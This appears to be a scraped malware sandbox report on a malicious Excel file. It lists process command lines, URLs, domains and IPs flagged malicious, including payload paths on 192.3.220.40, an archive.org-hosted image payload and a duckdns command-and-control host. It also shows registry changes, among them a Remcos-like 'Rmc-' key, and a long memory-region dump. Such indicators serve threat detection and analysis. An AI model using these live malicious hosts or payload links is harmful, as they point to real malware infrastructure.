C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP"
There are 12 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
192.3.220.40
 malicious
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
207.241.227.242
 malicious
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot
unknown
 malicious
http://192.3.220.40/330/RRCGGH.txt
192.3.220.40
 malicious
idabo.duckdns.org
malicious
https://ia600102.us.archive.org
unknown
 malicious
http://192.3.220.40/330/verybestthingswesharedfornew.tIF
192.3.220.40
 malicious
https://ia600102.us.archive.org/32/it
unknown
 malicious
http://192.3.220.40/$
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
https://wrath.me/EhYykLr.htay(
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
http://192.3.220.40/330/uh/newthingtobeonlinefor.htazzC:
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
https://wrath.me/EhYykL
188.114.96.3
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://192.3.220.40/330/uh/newthingtobeonlinefor.htaY3
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
https://wrath.me/bu
unknown
https://www.google.com
unknown
http://geoplugin.net/json.gp/C
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://nuget.org/nuget.exe
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://wrath.me/EhYykLs#
unknown
http://192.3.220.40/330/uh/newthingtobeonlinefor.hta3
unknown
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
unknown
http://192.3.220.40/330/verybestthingswesharedfornew.tIFp
unknown
http://go.cr
unknown
http://crl.usertru4
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
https://wrath.me/EhYykL1(
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
https://wrath.me/EhYykLm
unknown
https://wrath.me/EhYykLi
unknown
http://192.3.220.40
unknown
http://192.3.220.40/330/uh/newthingtobeonlinefor.htaes
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverhei
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://crl.entr
unknown
http://www.msn.com/
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
http://192.3.220.40/330/uh/newthingtobeonlinefor.htaP3
unknown
https://www.google.com/accounts/servicelogin
unknown
http://192.3.220.40/330/verybestthingswesharedfornew.tIF7
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://192.3.220.40/330/verybestthingswesharedfornew.tIF/
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://b.scorecardresearch.com/beacon.js
unknown
https://wrath.me/EhYykL/
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://ocsp.entrust.net03
unknown
http://192.3.220.40/330/uh/newthingtobeonlinefor.htaks
unknown
https://wrath.me/EhYykLr.htax
unknown
https://contoso.com/License
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://go.micros
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://wrath.me/
unknown
http://192.3.220.40/330/uh/newthingtobeonlinefor.hta=3
unknown
http://192.3.220.40/330/verybest
unknown
https://wrath.me//
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://geoplugin.net/json.gpO
unknown
https://contoso.com/
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://192.3.220.40/330/uh/newthingtobeonlinefor.htahttp://192.3.220.40/330/uh/newthingtobeonlinefor
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://ocsp.entrust.net0D
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
http://192.3.220.40/
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://geoplugin.net/json.gpy
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://www.imvu.com/GK
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ia600102.us.archive.org
207.241.227.242
 malicious
idabo.duckdns.org
135.148.195.248
 malicious
wrath.me
188.114.96.3
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
135.148.195.248
idabo.duckdns.org
United States
malicious
207.241.227.242
ia600102.us.archive.org
United States
malicious
192.3.220.40
unknown
United States
malicious
188.114.97.3
unknown
European Union
188.114.96.3
wrath.me
European Union
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
0d0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2B126
2B126
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
uq0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\348F2
348F2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\349DC
349DC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3510D
3510D
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\349DC
349DC
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Rmc-I89M3S
exepath
HKEY_CURRENT_USER\Software\Rmc-I89M3S
licence
HKEY_CURRENT_USER\Software\Rmc-I89M3S
time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 84 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1285E000
trusted library allocation
page read and write
 malicious
248E000
stack
page read and write
 malicious
88E000
heap
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
14A70000
trusted library allocation
page read and write
 malicious
1491D000
trusted library allocation
page read and write
 malicious
835000
heap
page read and write
 malicious
8C0000
heap
page read and write
 malicious
7D1000
heap
page read and write
 malicious
851000
heap
page read and write
 malicious
129B1000
trusted library allocation
page read and write
 malicious
360000
direct allocation
page read and write
39E5000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
3A1B000
heap
page read and write
1EFF000
stack
page read and write
3A19000
heap
page read and write
32F000
heap
page read and write
1B20000
heap
page read and write
4F3B000
heap
page read and write
41A000
heap
page read and write
380000
heap
page read and write
3A14000
heap
page read and write
4C63000
heap
page read and write
389000
heap
page read and write
7CC000
heap
page read and write
532000
heap
page read and write
1C36E000
heap
page read and write
4C63000
heap
page read and write
1F70000
heap
page read and write
7FE89B53000
trusted library allocation
page read and write
410E000
stack
page read and write
1C2F0000
heap
page read and write
7FE899B7000
trusted library allocation
page read and write
26C3000
trusted library allocation
page read and write
46B5000
heap
page read and write
3C9E000
stack
page read and write
467000
heap
page read and write
7FE89990000
trusted library allocation
page read and write
1AD4F000
stack
page read and write
458000
heap
page read and write
1C3C6000
heap
page read and write
239F000
trusted library allocation
page read and write
4297000
heap
page read and write
4C5F000
heap
page read and write
20000
heap
page read and write
7FE898D0000
trusted library allocation
page execute and read and write
5A7000
direct allocation
page read and write
44FD000
heap
page read and write
517000
heap
page read and write
41EB000
trusted library allocation
page read and write
7FE89A34000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
26D9000
trusted library allocation
page read and write
44FB000
heap
page read and write
1B420000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
7FE898B6000
trusted library allocation
page read and write
26E7000
trusted library allocation
page read and write
49D000
heap
page read and write
41EB000
trusted library allocation
page read and write
33C7000
trusted library allocation
page read and write
4AA000
heap
page read and write
2CC000
heap
page read and write
435000
heap
page read and write
351000
heap
page read and write
1C42C000
heap
page read and write
32B000
heap
page read and write
1D90000
trusted library allocation
page read and write
1B0DF000
stack
page read and write
526000
heap
page read and write
42AC000
heap
page read and write
232F000
stack
page read and write
2190000
heap
page read and write
4303000
heap
page read and write
5819000
heap
page read and write
2FF000
trusted library allocation
page read and write
39E7000
heap
page read and write
36B000
heap
page read and write
39D4000
heap
page read and write
1C3CF000
heap
page read and write
36C0000
heap
page read and write
39F000
heap
page read and write
1B30E000
stack
page read and write
33AE000
heap
page read and write
456000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
32DD000
heap
page read and write
318E000
trusted library allocation
page read and write
3ACC000
trusted library allocation
page read and write
4F2D000
heap
page read and write
3150000
trusted library allocation
page read and write
19F000
heap
page read and write
4B2000
heap
page read and write
7FE89802000
trusted library allocation
page read and write
3AC0000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
1C31F000
heap
page read and write
20000
heap
page read and write
3A1B000
heap
page read and write
1C308000
heap
page read and write
26C2000
trusted library allocation
page read and write
1D40000
heap
page execute and read and write
207000
heap
page read and write
1C730000
heap
page read and write
42BE000
heap
page read and write
100000
heap
page read and write
26B9000
trusted library allocation
page read and write
1A840000
heap
page read and write
600000
direct allocation
page read and write
1C6F0000
heap
page read and write
2A0000
heap
page read and write
1A56E000
heap
page read and write
447A000
heap
page read and write
7FE89B81000
trusted library allocation
page read and write
37B4000
heap
page read and write
2B13000
trusted library allocation
page read and write
36A000
heap
page read and write
33B6000
heap
page read and write
1AB81000
heap
page read and write
445D000
heap
page read and write
7FE898A6000
trusted library allocation
page read and write
450000
heap
page read and write
370000
heap
page read and write
42C7000
heap
page read and write
1AE9E000
stack
page read and write
486000
heap
page read and write
4425000
heap
page read and write
26B7000
trusted library allocation
page read and write
530000
heap
page read and write
7FE89A10000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
7FE8980D000
trusted library allocation
page execute and read and write
36A000
heap
page read and write
46B000
heap
page read and write
250000
heap
page read and write
31C0000
heap
page read and write
115000
heap
page read and write
46B000
heap
page read and write
473F000
heap
page read and write
1B5B0000
heap
page read and write
42C3000
heap
page read and write
477000
heap
page read and write
4F9000
heap
page read and write
1ACCA000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
883000
heap
page read and write
7FE899E7000
trusted library allocation
page read and write
1ABA8000
heap
page read and write
10000
heap
page read and write
5D0000
heap
page read and write
30F6000
trusted library allocation
page read and write
50C0000
heap
page read and write
334C000
heap
page read and write
1A83A000
heap
page read and write
26DA000
trusted library allocation
page read and write
220000
heap
page read and write
4F3A000
heap
page read and write
45C000
heap
page read and write
1D0000
trusted library allocation
page read and write
41EB000
trusted library allocation
page read and write
468000
heap
page read and write
7FE899E0000
trusted library allocation
page execute and read and write
12461000
trusted library allocation
page read and write
1C6B0000
heap
page read and write
8B9000
heap
page read and write
33C7000
trusted library allocation
page read and write
34E9000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
36C1000
heap
page read and write
447000
heap
page read and write
1BD6000
heap
page read and write
3A27000
heap
page read and write
4425000
heap
page read and write
44FA000
heap
page read and write
1A6A0000
heap
page execute and read and write
7FE8980D000
trusted library allocation
page execute and read and write
1AA8E000
stack
page read and write
2311000
trusted library allocation
page read and write
2B2E000
stack
page read and write
46CE000
heap
page read and write
485000
heap
page read and write
3361000
trusted library allocation
page read and write
42C7000
heap
page read and write
38B0000
heap
page read and write
3FA5000
trusted library allocation
page read and write
7FE898D0000
trusted library allocation
page execute and read and write
7FE89930000
trusted library allocation
page execute and read and write
7FE89A14000
trusted library allocation
page read and write
447A000
heap
page read and write
26E2000
trusted library allocation
page read and write
383E000
unkown
page read and write
389000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
4C4B000
heap
page read and write
493000
heap
page read and write
46BC000
heap
page read and write
339E000
heap
page read and write
1F0000
heap
page read and write
7FFFFF85000
trusted library allocation
page execute read
4AC000
heap
page read and write
1AB85000
heap
page read and write
42C7000
heap
page read and write
7FE89C50000
trusted library allocation
page read and write
430000
heap
page read and write
37F000
heap
page read and write
223000
stack
page read and write
299A000
trusted library allocation
page read and write
41EB000
trusted library allocation
page read and write
1CB0000
trusted library allocation
page read and write
46D7000
heap
page read and write
477000
heap
page read and write
1BF50000
heap
page read and write
4F37000
heap
page read and write
7FE89830000
trusted library allocation
page read and write
495000
heap
page read and write
1AA49000
heap
page read and write
3973000
heap
page read and write
34F0000
trusted library allocation
page read and write
4C0A000
heap
page read and write
46C8000
heap
page read and write
1A757000
heap
page read and write
309000
heap
page read and write
36A000
heap
page read and write
58D6000
heap
page read and write
7FE89A38000
trusted library allocation
page read and write
620000
heap
page read and write
447D000
heap
page read and write
336E000
trusted library allocation
page read and write
52D000
heap
page read and write
501000
heap
page read and write
5878000
heap
page read and write
1A980000
heap
page read and write
33C7000
trusted library allocation
page read and write
4F1000
heap
page read and write
2350000
heap
page execute and read and write
426000
heap
page read and write
39FD000
heap
page read and write
124F1000
trusted library allocation
page read and write
1F70000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
382000
heap
page read and write
2E4000
heap
page read and write
1ABF9000
heap
page read and write
31D0000
heap
page read and write
517000
heap
page read and write
2FFE000
stack
page read and write
3E3000
heap
page read and write
408000
heap
page read and write
7FE898C6000
trusted library allocation
page read and write
2F6B000
trusted library allocation
page read and write
7FE89823000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
12330000
trusted library allocation
page read and write
1A750000
heap
page read and write
4304000
heap
page read and write
2F74000
trusted library allocation
page read and write
56B000
heap
page read and write
59CE000
heap
page read and write
7FE897FD000
trusted library allocation
page execute and read and write
2451000
trusted library allocation
page read and write
2600000
remote allocation
page read and write
2F6E000
trusted library allocation
page read and write
447E000
heap
page read and write
4240000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page read and write
4C70000
trusted library allocation
page read and write
3348000
heap
page read and write
7FE89820000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
33A6000
heap
page read and write
26BD000
trusted library allocation
page read and write
40F000
heap
page read and write
57F000
heap
page read and write
3A9000
heap
page read and write
7FE89814000
trusted library allocation
page read and write
1FA6000
heap
page read and write
429000
heap
page read and write
1B36F000
stack
page read and write
2F72000
trusted library allocation
page read and write
2D3E000
stack
page read and write
4294000
heap
page read and write
2E0000
heap
page read and write
42B8000
heap
page read and write
44D0000
heap
page read and write
458000
heap
page read and write
34F0000
trusted library allocation
page read and write
42E000
heap
page read and write
33C7000
trusted library allocation
page read and write
1C700000
trusted library section
page read and write
1B090000
heap
page read and write
4426000
heap
page read and write
373A000
heap
page read and write
1AD23000
heap
page read and write
244E000
stack
page read and write | page guard
450A000
heap
page read and write
489000
heap
page read and write
589B000
heap
page read and write
46C000
heap
page read and write
10000
heap
page read and write
226000
heap
page read and write
2C4F000
stack
page read and write
10000
heap
page read and write
1BF6000
heap
page read and write
3B0000
heap
page read and write
41F000
heap
page read and write
13F000
heap
page read and write
46B000
heap
page read and write
2E00000
trusted library allocation
page read and write
3FF000
heap
page read and write
50C1000
heap
page read and write
20000
heap
page read and write
58B3000
heap
page read and write
46AA000
heap
page read and write
2A0000
heap
page read and write
3A29000
heap
page read and write
1B1AE000
stack
page read and write
1A4EE000
heap
page execute and read and write
38E000
heap
page read and write
1AD17000
heap
page read and write
1C310000
heap
page read and write
1DE0000
heap
page execute and read and write
2F0000
trusted library allocation
page read and write
278000
heap
page read and write
7FE899F0000
trusted library allocation
page read and write
7FE89C30000
trusted library allocation
page read and write
1A62C000
heap
page read and write
41EB000
trusted library allocation
page read and write
382000
heap
page read and write
1E30000
direct allocation
page read and write
142000
stack
page read and write
2321000
trusted library allocation
page read and write
42FE000
heap
page read and write
1351D000
trusted library allocation
page read and write
2F6A000
trusted library allocation
page read and write
1C96F000
stack
page read and write
41EB000
trusted library allocation
page read and write
7FE89812000
trusted library allocation
page read and write
5795000
heap
page read and write
4509000
heap
page read and write
43C000
heap
page read and write
2C05000
heap
page read and write
7FE89A60000
trusted library allocation
page read and write
50DA000
heap
page read and write
1C2A0000
heap
page read and write
7FE89A20000
trusted library allocation
page read and write
46B000
heap
page read and write
33B6000
heap
page read and write
46CF000
heap
page read and write
7FE89A00000
trusted library allocation
page execute and read and write
46B9000
heap
page read and write
1AC1D000
heap
page read and write
464000
heap
page read and write
336A000
trusted library allocation
page read and write
7FE89950000
trusted library allocation
page execute and read and write
58CA000
heap
page read and write
1BC6000
heap
page read and write
41EB000
trusted library allocation
page read and write
429C000
heap
page read and write
56C000
heap
page read and write
450000
heap
page read and write
3BFF000
stack
page read and write
39E5000
heap
page read and write
1CE0000
heap
page execute and read and write
486000
heap
page read and write
1A6CF000
stack
page read and write
7FE89BC0000
trusted library allocation
page read and write
42C1000
heap
page read and write
2C00000
heap
page read and write
26000
heap
page read and write
1A5C7000
heap
page read and write
4DA000
heap
page read and write
1A84A000
heap
page read and write
3FA0000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
334D000
heap
page read and write
486000
heap
page read and write
38D000
heap
page read and write
314B000
stack
page read and write
538000
heap
page read and write
309000
heap
page read and write
2D60000
trusted library allocation
page read and write
1C2000
stack
page read and write
474000
remote allocation
page execute and read and write
3A27000
heap
page read and write
3180000
trusted library allocation
page read and write
39BD000
heap
page read and write
473D000
heap
page read and write
46CA000
heap
page read and write
28AE000
trusted library allocation
page read and write
7FE89A10000
trusted library allocation
page read and write
1A763000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
335E000
trusted library allocation
page read and write
2F61000
trusted library allocation
page read and write
3E2000
heap
page read and write
239000
heap
page read and write
46BE000
heap
page read and write
19C000
stack
page read and write
7FE89992000
trusted library allocation
page read and write
1AD53000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
1C42A000
heap
page read and write
39D4000
heap
page read and write
4B4000
heap
page read and write
4F34000
heap
page read and write
12351000
trusted library allocation
page read and write
3FA0000
trusted library allocation
page read and write
33C7000
trusted library allocation
page read and write
379000
heap
page read and write
3C8000
heap
page read and write
4491000
heap
page read and write
7FE89B86000
trusted library allocation
page read and write
42AC000
heap
page read and write
36A000
heap
page read and write
4F3A000
heap
page read and write
4C63000
heap
page read and write
7FE89803000
trusted library allocation
page execute and read and write
12321000
trusted library allocation
page read and write
7FE89AC0000
trusted library allocation
page read and write
1A970000
heap
page read and write
4BE0000
heap
page read and write
2888000
trusted library allocation
page read and write
46B5000
heap
page read and write
3C4000
